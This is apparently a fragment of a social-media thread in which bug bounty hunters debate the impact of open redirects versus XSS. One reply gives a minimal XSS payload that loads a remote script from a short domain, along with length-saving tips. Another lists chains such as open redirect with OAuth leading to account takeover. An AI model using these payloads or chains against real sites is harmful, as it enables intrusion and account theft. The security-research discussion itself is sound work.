Raphael Silva Justin Gardner hakluke That’s basically it. But that’s also the two attack scenarios for xss

Raphael Silva Justin Gardner hakluke Of course you’re right xss can be much more easily weaponized. But I would argue that xss without further escalation is only useful for phishing and open redirect would do a similar job

Justin Gardner xssdoctor hakluke Apart from phishing and being part of an exploit chain what other uses do you usually see? Genuinely asking, I feel like I could do more with these and they are everywhere

xssdoctor Justin Gardner hakluke I'd say that's pretty reductive of XSS, the ceiling is much higher there a lot of the time unless you're severely restricted in some way

Arham Khan Something like <script src='//15.rs' ?

That's about 21 characters, so you still have space in there for a slightly bigger domain if you need. You don't need the scheme nor the last '>' most of the time.

Raphael Silva I am almost certain this is unexploitable. If that changes I'll tell ya.

Raphael Silva Yeah, I think the blocker here is the lack of being able to supply our own DTD.

Raphael Silva xssdoctor hakluke Yeah, I mean 'being a part of an exploit chain' is SUPER broad, so putting that aside there isn't anything, but as for chains:
* OR => XSS (if it is client-side OR and JS scheme is available)
* OR + CSPT => XSS or CSRF
* SSRF + OR => Bypassed Host Restrictions
* OAuth + OR => ATO